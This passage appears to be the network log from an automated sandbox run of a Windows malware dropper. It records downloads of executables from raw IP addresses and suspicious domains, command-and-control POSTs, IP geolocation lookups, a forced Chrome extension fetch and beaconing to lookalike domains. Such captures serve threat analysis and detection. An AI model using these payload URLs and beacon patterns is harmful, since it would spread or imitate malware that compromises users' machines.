Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Plo0PQKzVB2Uexjdo%2B5pHzzY4IxdauKL1huZdCYoil09DUqrx8OokiP1MSybpEUdSTQNQz7H165Pt1eMNIFjxSN%2FOGWWHRYxhfz1WkPt32ECnCbbSQVTXdzGn98s1v%2BzDV8%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87f42616aae16341-LHR
alt-svc: h3=":443"; ma=86400
-
GEThttps://firstfirecar.com/6998c6a8d4954ef9ee79e698cdc0836d/baf14778c246e15550645e30ba78ce1c.exeregsvcs.exeRemote address:104.21.60.76:443RequestGET /6998c6a8d4954ef9ee79e698cdc0836d/baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
Host: firstfirecar.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: application/x-ms-dos-executable
Content-Length: 4361104
Connection: keep-alive
Last-Modified: Sun, 05 May 2024 21:54:54 GMT
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 139
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QGUWHG6esKnuipQ56jQW6V4YVWwUXsX43jroNoqKlohrSJJ6bAzAydYjSzRVnOYt8%2Bt9Vzk%2Be6FjEsOQa7tXJ4XPhVFq%2FOqbjwZCVkOdGmt3GvVCXt6PVINT0HU2zRHkD9NB"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87f42616c91b4599-LHR
alt-svc: h3=":443"; ma=86400
-
GEThttps://firstfirecar.com/6998c6a8d4954ef9ee79e698cdc0836d/baf14778c246e15550645e30ba78ce1c.exeregsvcs.exeRemote address:104.21.60.76:443RequestGET /6998c6a8d4954ef9ee79e698cdc0836d/baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
Host: firstfirecar.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: application/x-ms-dos-executable
Content-Length: 4361104
Connection: keep-alive
Last-Modified: Sun, 05 May 2024 21:54:54 GMT
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 122
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4SeNClImOpfj3XNCYSvpyEL4OBWlVy7GPfFUhjyByFlJx9ggPVAnpldY5yJVNK3fOTX%2BjcQ8Ih0defIZSNGhYzBDcNzU3H99YR2ScyPUwM9WC%2Fsag6lvIKu5bxQybm9HWdVL"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87f42616cad49565-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:8.8.8.8:53Requestsweetsquarediaslw.shopIN AResponsesweetsquarediaslw.shopIN A172.67.203.170sweetsquarediaslw.shopIN A104.21.44.201
-
Remote address:185.172.128.19:80RequestGET /NewB.exe HTTP/1.1
Host: 185.172.128.19
ResponseHTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:26:16 GMT
Content-Type: application/octet-stream
Content-Length: 428544
Last-Modified: Thu, 09 Nov 2023 18:10:51 GMT
Connection: keep-alive
ETag: "654d20ab-68a00"
Accept-Ranges: bytes
-
Remote address:8.8.8.8:53Request67.65.42.5.in-addr.arpaIN PTRResponse
-
Remote address:185.172.128.19:80RequestPOST /ghsdh39s/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.172.128.19
Content-Length: 4
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:26:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.172.128.19:80RequestPOST /ghsdh39s/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.172.128.19
Content-Length: 158
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:26:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.172.128.19:80ResponseHTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:26:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.172.128.59:80RequestGET /ISetup8.exe HTTP/1.1
Host: 185.172.128.59
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Sun, 05 May 2024 22:15:01 GMT
ETag: "68201-617bc48bc7f8f"
Accept-Ranges: bytes
Content-Length: 426497
Content-Type: application/x-msdos-program
-
Remote address:8.8.8.8:53Requestjunglethomas.comIN AResponsejunglethomas.comIN A104.21.92.190junglethomas.comIN A172.67.197.33
-
Remote address:193.233.132.234:80ResponseHTTP/1.1 200 OK
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Sun, 05 May 2024 06:37:39 GMT
ETag: "63aba2-617af307316c9"
Accept-Ranges: bytes
Content-Length: 6532002
Content-Type: application/x-msdownload
-
Remote address:8.8.8.8:53Responseipinfo.ioIN A34.117.186.192
-
Remote address:34.117.186.192:443RequestGET /widget/demo/191.101.209.39 HTTP/1.1
Connection: Keep-Alive
Referer: https://ipinfo.io/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Host: ipinfo.io
-
Remote address:8.8.8.8:53Request26.56.192.85.in-addr.arpaIN PTRResponse26.56.192.85.in-addr.arpaIN PTRsomber-healthaezanetwork
-
Remote address:8.8.8.8:53Request59.8.26.104.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request48.229.111.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestservice-domain.xyzIN AResponseservice-domain.xyzIN A3.80.150.121
-
GEThttps://service-domain.xyz/google_ifi_ico.png?rnd=yb3VBr8YUm4Bvu3oOx6xH_DYEC5GYEC3AYEC6OYEC3GYEC4RZEC3NYEC8AYEC8RZEC3PXEC6RZEC7TVEC0CotgOgQ.exeRemote address:3.80.150.121:443RequestGET /google_ifi_ico.png?rnd=yb3VBr8YUm4Bvu3oOx6xH_DYEC5GYEC3AYEC6OYEC3GYEC4RZEC3NYEC8AYEC8RZEC3PXEC6RZEC7TVEC0 HTTP/1.1
Host: service-domain.xyz
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:27:16 GMT
Content-Type: image/png
Content-Length: 95
Connection: keep-alive
Access-Control-Allow-Origin: *
Cache-control: no-cache="set-cookie"
Set-Cookie: AWSELB=9327DF5F0AF3D375CDC9DE0AFF98FDC82A9589C9820401D99493DFDF796F3DAB0062EEFB3E4A533F5B2753F2532FBA9D17E5754692E8600D254000879A4CE3001E279F1EF5;PATH=/;MAX-AGE=43200
Set-Cookie: AWSELBCORS=9327DF5F0AF3D375CDC9DE0AFF98FDC82A9589C9820401D99493DFDF796F3DAB0062EEFB3E4A533F5B2753F2532FBA9D17E5754692E8600D254000879A4CE3001E279F1EF5;PATH=/;MAX-AGE=43200;SECURE;SAMESITE=None
-
GEThttps://service-domain.xyz/google_ifi_ico.png?rnd=kE3mAh2aM5ME8QZf1Kf_KEWB6PEWB4JEWB6XEWB1PEWB7MDWB0UEWB3JEWB5MDWB1WDWB2MDWB4YGWB7FhZPPvs.exeRemote address:3.80.150.121:443RequestGET /google_ifi_ico.png?rnd=kE3mAh2aM5ME8QZf1Kf_KEWB6PEWB4JEWB6XEWB1PEWB7MDWB0UEWB3JEWB5MDWB1WDWB2MDWB4YGWB7 HTTP/1.1
Host: service-domain.xyz
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:27:16 GMT
Content-Type: image/png
Content-Length: 95
Connection: keep-alive
Access-Control-Allow-Origin: *
Cache-control: no-cache="set-cookie"
Set-Cookie: AWSELB=9327DF5F0AF3D375CDC9DE0AFF98FDC82A9589C9824CDF98F06272B58281A369C0E7C7AE6EC5781D948882C8767BA08E2574E7340BD1AEA80ADD88F1586867317B7C62D227;PATH=/;MAX-AGE=43200
Set-Cookie: AWSELBCORS=9327DF5F0AF3D375CDC9DE0AFF98FDC82A9589C9824CDF98F06272B58281A369C0E7C7AE6EC5781D948882C8767BA08E2574E7340BD1AEA80ADD88F1586867317B7C62D227;PATH=/;MAX-AGE=43200;SECURE;SAMESITE=None
-
Remote address:8.8.8.8:53Request11.97.55.23.in-addr.arpaIN PTRResponse11.97.55.23.in-addr.arpaIN PTRa23-55-97-11deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request121.150.80.3.in-addr.arpaIN PTRResponse121.150.80.3.in-addr.arpaIN PTRec2-3-80-150-121 compute-1 amazonawscom
-
Remote address:8.8.8.8:53Request80.190.18.2.in-addr.arpaIN PTRResponse80.190.18.2.in-addr.arpaIN PTRa2-18-190-80deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Requestclients2.google.comIN AResponseclients2.google.comIN CNAMEclients.l.google.comclients.l.google.comIN A172.217.16.238
-
GEThttps://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&kkLnvSrFVxCotgOgQ.exeRemote address:172.217.16.238:443RequestGET /service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&kkLnvSrFVx HTTP/1.1
Host: clients2.google.com
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sun, 05 May 2024 22:27:17 GMT
Location: https://clients2.googleusercontent.com/crx/blobs/AfQPRnkif1inWhBJ6y1gDsDQZ4Eyn_Qz_uLRCpaeXDwuVacP9m-meDjm0tJh22MKIBX7Qu2os3lQfBH4jrbinMvfs-3zRTSg6nxPBNENq5Js864RKJG5AMZSmuX13L8KhHlzOdsbuBGxxZNB_X1K4A/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
-
Remote address:8.8.8.8:53Request10.200.250.142.in-addr.arpaIN PTRResponse10.200.250.142.in-addr.arpaIN PTRlhr48s29-in-f101e100net
-
GEThttps://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&kLiQCBPVzBFhZPPvs.exeRemote address:172.217.16.238:443RequestGET /service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&kLiQCBPVzB HTTP/1.1
Host: clients2.google.com
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sun, 05 May 2024 22:27:17 GMT
Location: https://clients2.googleusercontent.com/crx/blobs/AfQPRnkif1inWhBJ6y1gDsDQZ4Eyn_Qz_uLRCpaeXDwuVacP9m-meDjm0tJh22MKIBX7Qu2os3lQfBH4jrbinMvfs-3zRTSg6nxPBNENq5Js864RKJG5AMZSmuX13L8KhHlzOdsbuBGxxZNB_X1K4A/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
-
Remote address:8.8.8.8:53Requestclients2.googleusercontent.comIN AResponseclients2.googleusercontent.comIN CNAMEgooglehosted.l.googleusercontent.comgooglehosted.l.googleusercontent.comIN A216.58.201.97
-
GEThttps://clients2.googleusercontent.com/crx/blobs/AfQPRnkif1inWhBJ6y1gDsDQZ4Eyn_Qz_uLRCpaeXDwuVacP9m-meDjm0tJh22MKIBX7Qu2os3lQfBH4jrbinMvfs-3zRTSg6nxPBNENq5Js864RKJG5AMZSmuX13L8KhHlzOdsbuBGxxZNB_X1K4A/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crxCotgOgQ.exeRemote address:216.58.201.97:443RequestGET /crx/blobs/AfQPRnkif1inWhBJ6y1gDsDQZ4Eyn_Qz_uLRCpaeXDwuVacP9m-meDjm0tJh22MKIBX7Qu2os3lQfBH4jrbinMvfs-3zRTSg6nxPBNENq5Js864RKJG5AMZSmuX13L8KhHlzOdsbuBGxxZNB_X1K4A/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx HTTP/1.1
Connection: Keep-Alive
Cache-Control: no-cache
Host: clients2.googleusercontent.com
ResponseHTTP/1.1 200 OK
Content-Length: 26186
X-GUploader-UploadID: ABPtcPr-cxkWLpwK9DGwSxbVWQ1JKmK6E_vuETCmDifkkMz2KMprS2K25yxmgt23Bbvk91NphrjQKbX-_A
X-Goog-Hash: crc32c=i5zIOg==
Server: UploadServer
Date: Sun, 05 May 2024 20:58:55 GMT
Expires: Mon, 05 May 2025 20:58:55 GMT
Cache-Control: public, max-age=31536000
Age: 5302
Last-Modified: Fri, 31 Mar 2023 12:41:59 GMT
ETag: eefd433b_0ed85c7c_6772d0c2_d374e578_c3d87100
Content-Type: application/x-chrome-extension
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
GEThttps://clients2.googleusercontent.com/crx/blobs/AfQPRnkif1inWhBJ6y1gDsDQZ4Eyn_Qz_uLRCpaeXDwuVacP9m-meDjm0tJh22MKIBX7Qu2os3lQfBH4jrbinMvfs-3zRTSg6nxPBNENq5Js864RKJG5AMZSmuX13L8KhHlzOdsbuBGxxZNB_X1K4A/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crxFhZPPvs.exeRemote address:216.58.201.97:443RequestGET /crx/blobs/AfQPRnkif1inWhBJ6y1gDsDQZ4Eyn_Qz_uLRCpaeXDwuVacP9m-meDjm0tJh22MKIBX7Qu2os3lQfBH4jrbinMvfs-3zRTSg6nxPBNENq5Js864RKJG5AMZSmuX13L8KhHlzOdsbuBGxxZNB_X1K4A/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx HTTP/1.1
Connection: Keep-Alive
Cache-Control: no-cache
Host: clients2.googleusercontent.com
ResponseHTTP/1.1 200 OK
Content-Length: 26186
X-GUploader-UploadID: ABPtcPr-cxkWLpwK9DGwSxbVWQ1JKmK6E_vuETCmDifkkMz2KMprS2K25yxmgt23Bbvk91NphrjQKbX-_A
X-Goog-Hash: crc32c=i5zIOg==
Server: UploadServer
Date: Sun, 05 May 2024 20:58:55 GMT
Expires: Mon, 05 May 2025 20:58:55 GMT
Cache-Control: public, max-age=31536000
Age: 5302
Last-Modified: Fri, 31 Mar 2023 12:41:59 GMT
ETag: eefd433b_0ed85c7c_6772d0c2_d374e578_c3d87100
Content-Type: application/x-chrome-extension
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
Remote address:8.8.8.8:53Request238.16.217.172.in-addr.arpaIN PTRResponse238.16.217.172.in-addr.arpaIN PTRlhr48s28-in-f141e100net238.16.217.172.in-addr.arpaIN PTRmad08s04-in-f14�I
-
Remote address:8.8.8.8:53Request97.201.58.216.in-addr.arpaIN PTRResponse97.201.58.216.in-addr.arpaIN PTRlhr48s48-in-f11e100net97.201.58.216.in-addr.arpaIN PTRprg03s02-in-f1�G97.201.58.216.in-addr.arpaIN PTRprg03s02-in-f97�G
-
Remote address:8.8.8.8:53Requestapi3.check-data.xyzIN AResponseapi3.check-data.xyzIN CNAMEcheckdata-1114476139.us-west-2.elb.amazonaws.comcheckdata-1114476139.us-west-2.elb.amazonaws.comIN A44.231.33.228checkdata-1114476139.us-west-2.elb.amazonaws.comIN A35.82.94.151
-
Remote address:44.231.33.228:80RequestPOST /api2/google_api_ifi HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/0 Safari/537.36
Host: api3.check-data.xyz
Content-Length: 731
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Cache-control: no-cache="set-cookie"
Content-Type: text/html; charset=UTF-8
Date: Sun, 05 May 2024 22:28:53 GMT
Server: nginx
Set-Cookie: AWSELB=9327DF5F0AF3D375CDC9DE0AFF98FDC82A9589C9824CDF98F06272B58281A369C0E7C7AE6EC5781D948882C8767BA08E2574E7340BD1AEA80ADD88F1586867317B7C62D227;PATH=/;MAX-AGE=43200
Content-Length: 0
Connection: keep-alive
-
Remote address:8.8.8.8:53Request228.33.231.44.in-addr.arpaIN PTRResponse228.33.231.44.in-addr.arpaIN PTRec2-44-231-33-228 us-west-2compute amazonawscom
-
Remote address:8.8.8.8:53Request172.210.232.199.in-addr.arpaIN PTRResponse
-
Remote address:185.172.128.90:80RequestGET /cpa/ping.php?substr=five&s=ab&sub=0 HTTP/1.1
Host: 185.172.128.90
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Content-Type: text/html; charset=UTF-8
-
Remote address:8.8.8.8:53Request90.128.172.185.in-addr.arpaIN PTRResponse
-
Remote address:185.172.128.228:80RequestGET /ping.php?substr=five HTTP/1.1
Host: 185.172.128.228
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Content-Type: text/html; charset=UTF-8
-
Remote address:185.172.128.59:80RequestGET /syncUpd.exe HTTP/1.1
Host: 185.172.128.59
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Sun, 05 May 2024 22:15:01 GMT
ETag: "44a00-617bc48b8a72d"
Accept-Ranges: bytes
Content-Length: 281088
Content-Type: application/x-msdos-program
-
Remote address:185.172.128.228:80RequestGET /BroomSetup.exe HTTP/1.1
Host: 185.172.128.228
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Fri, 15 Mar 2024 11:59:56 GMT
ETag: "4a4030-613b1bf118700"
Accept-Ranges: bytes
Content-Length: 4866096
Content-Type: application/x-msdos-program
-
Remote address:8.8.8.8:53Request228.128.172.185.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestsvc.iolo.comIN AResponsesvc.iolo.comIN A20.157.87.45
-
Remote address:20.157.87.45:80RequestPOST /__svc/sbv/DownloadManager.ashx HTTP/1.0
Connection: keep-alive
Content-Length: 300
Host: svc.iolo.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)
ResponseHTTP/1.1 200 OK
content-length: 256
content-type: text/html; charset=utf-8
x-whom: Ioloweb7
date: Sun, 05 May 2024 22:27:32 GMT
set-cookie: SERVERID=svc7; path=/
connection: close
-
Remote address:8.8.8.8:53Request45.87.157.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestdownload.iolo.netIN AResponsedownload.iolo.netIN CNAMEiolo0.b-cdn.netiolo0.b-cdn.netIN A185.93.2.246
-
HEADhttps://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exeBITSRemote address:185.93.2.246:443RequestHEAD /sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.8
Host: download.iolo.net
ResponseHTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 59721128
Connection: keep-alive
Server: BunnyCDN-FR1-946
CDN-PullZone: 1654350
CDN-Uid: 5b8ea5d8-68d6-4057-a57d-a5f315142028
CDN-RequestCountryCode: GB
Cache-Control: public, max-age=259200
Last-Modified: Tue, 19 Mar 2024 23:10:11 GMT
CDN-StorageServer: DE-680
CDN-FileServer: 757
CDN-ProxyVer: 1.04
CDN-RequestPullSuccess: True
CDN-RequestPullCode: 206
CDN-CachedAt: 05/01/2024 17:21:57
CDN-EdgeStorageId: 1072
CDN-Status: 200
CDN-RequestId: f1aff9836f5a7034c939caf1396f59a9
CDN-Cache: HIT
Accept-Ranges: bytes
-
GEThttps://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exeBITSRemote address:185.93.2.246:443RequestGET /sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Tue, 19 Mar 2024 23:10:11 GMT
Range: bytes=0-11199
User-Agent: Microsoft BITS/7.8
Host: download.iolo.net
ResponseHTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 11200
Connection: keep-alive
Server: BunnyCDN-FR1-946
CDN-PullZone: 1654350
CDN-Uid: 5b8ea5d8-68d6-4057-a57d-a5f315142028
CDN-RequestCountryCode: GB
Cache-Control: public, max-age=259200
Last-Modified: Tue, 19 Mar 2024 23:10:11 GMT
CDN-StorageServer: DE-680
CDN-FileServer: 757
CDN-ProxyVer: 1.04
CDN-RequestPullSuccess: True
CDN-RequestPullCode: 206
CDN-CachedAt: 05/01/2024 17:21:57
CDN-EdgeStorageId: 1072
CDN-Status: 200
CDN-RequestId: cef8aae71e5b32ee78942f471581448e
CDN-Cache: HIT
Content-Range: bytes 0-11199/59721128
-
GEThttps://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exeBITSRemote address:185.93.2.246:443RequestGET /sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Tue, 19 Mar 2024 23:10:11 GMT
Range: bytes=11200-190399
User-Agent: Microsoft BITS/7.8
Host: download.iolo.net
ResponseHTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 179200
Connection: keep-alive
Server: BunnyCDN-FR1-946
CDN-PullZone: 1654350
CDN-Uid: 5b8ea5d8-68d6-4057-a57d-a5f315142028
CDN-RequestCountryCode: GB
Cache-Control: public, max-age=259200
Last-Modified: Tue, 19 Mar 2024 23:10:11 GMT
CDN-StorageServer: DE-680
CDN-FileServer: 757
CDN-ProxyVer: 1.04
CDN-RequestPullSuccess: True
CDN-RequestPullCode: 206
CDN-CachedAt: 05/01/2024 17:21:57
CDN-EdgeStorageId: 1072
CDN-Status: 200
CDN-RequestId: cdb07560d5dd1215cdea64ef643452b1
CDN-Cache: HIT
Content-Range: bytes 11200-190399/59721128
-
GEThttps://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exeBITSRemote address:185.93.2.246:443RequestGET /sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Tue, 19 Mar 2024 23:10:11 GMT
Range: bytes=190400-1826928
User-Agent: Microsoft BITS/7.8
Host: download.iolo.net
ResponseHTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 1636529
Connection: keep-alive
Server: BunnyCDN-FR1-946
CDN-PullZone: 1654350
CDN-Uid: 5b8ea5d8-68d6-4057-a57d-a5f315142028
CDN-RequestCountryCode: GB
Cache-Control: public, max-age=259200
Last-Modified: Tue, 19 Mar 2024 23:10:11 GMT
CDN-StorageServer: DE-680
CDN-FileServer: 757
CDN-ProxyVer: 1.04
CDN-RequestPullSuccess: True
CDN-RequestPullCode: 206
CDN-CachedAt: 05/01/2024 17:21:57
CDN-EdgeStorageId: 1072
CDN-Status: 200
CDN-RequestId: ad6859833c784224e8c3eb5b94a70317
CDN-Cache: HIT
Content-Range: bytes 190400-1826928/59721128
-
GEThttps://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exeBITSRemote address:185.93.2.246:443RequestGET /sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Tue, 19 Mar 2024 23:10:11 GMT
Range: bytes=1826929-9316763
User-Agent: Microsoft BITS/7.8
Host: download.iolo.net
ResponseHTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 7489835
Connection: keep-alive
Server: BunnyCDN-FR1-946
CDN-PullZone: 1654350
CDN-Uid: 5b8ea5d8-68d6-4057-a57d-a5f315142028
CDN-RequestCountryCode: GB
Cache-Control: public, max-age=259200
Last-Modified: Tue, 19 Mar 2024 23:10:11 GMT
CDN-StorageServer: DE-680
CDN-FileServer: 757
CDN-ProxyVer: 1.04
CDN-RequestPullSuccess: True
CDN-RequestPullCode: 206
CDN-CachedAt: 05/01/2024 17:21:57
CDN-EdgeStorageId: 1072
CDN-Status: 200
CDN-RequestId: 9b296eda123bc904516df79d92fe59ee
CDN-Cache: HIT
Content-Range: bytes 1826929-9316763/59721128
-
GEThttps://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exeBITSRemote address:185.93.2.246:443RequestGET /sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Tue, 19 Mar 2024 23:10:11 GMT
Range: bytes=9316764-26128962
User-Agent: Microsoft BITS/7.8
Host: download.iolo.net
ResponseHTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 16812199
Connection: keep-alive
Server: BunnyCDN-FR1-946
CDN-PullZone: 1654350
CDN-Uid: 5b8ea5d8-68d6-4057-a57d-a5f315142028
CDN-RequestCountryCode: GB
Cache-Control: public, max-age=259200
Last-Modified: Tue, 19 Mar 2024 23:10:11 GMT
CDN-StorageServer: DE-662
CDN-FileServer: 757
CDN-ProxyVer: 1.04
CDN-RequestPullSuccess: True
CDN-RequestPullCode: 206
CDN-CachedAt: 05/01/2024 17:23:53
CDN-EdgeStorageId: 1072
CDN-Status: 200
CDN-RequestId: cc4d850abb6c97e8e6b73e9ea197f32e
CDN-Cache: HIT
Content-Range: bytes 9316764-26128962/59721128
-
GEThttps://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exeBITSRemote address:185.93.2.246:443RequestGET /sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Tue, 19 Mar 2024 23:10:11 GMT
Range: bytes=26128963-44675237
User-Agent: Microsoft BITS/7.8
Host: download.iolo.net
-
GEThttps://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exeBITSRemote address:185.93.2.246:443RequestGET /sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Tue, 19 Mar 2024 23:10:11 GMT
Range: bytes=44675238-59721127
User-Agent: Microsoft BITS/7.8
Host: download.iolo.net
-
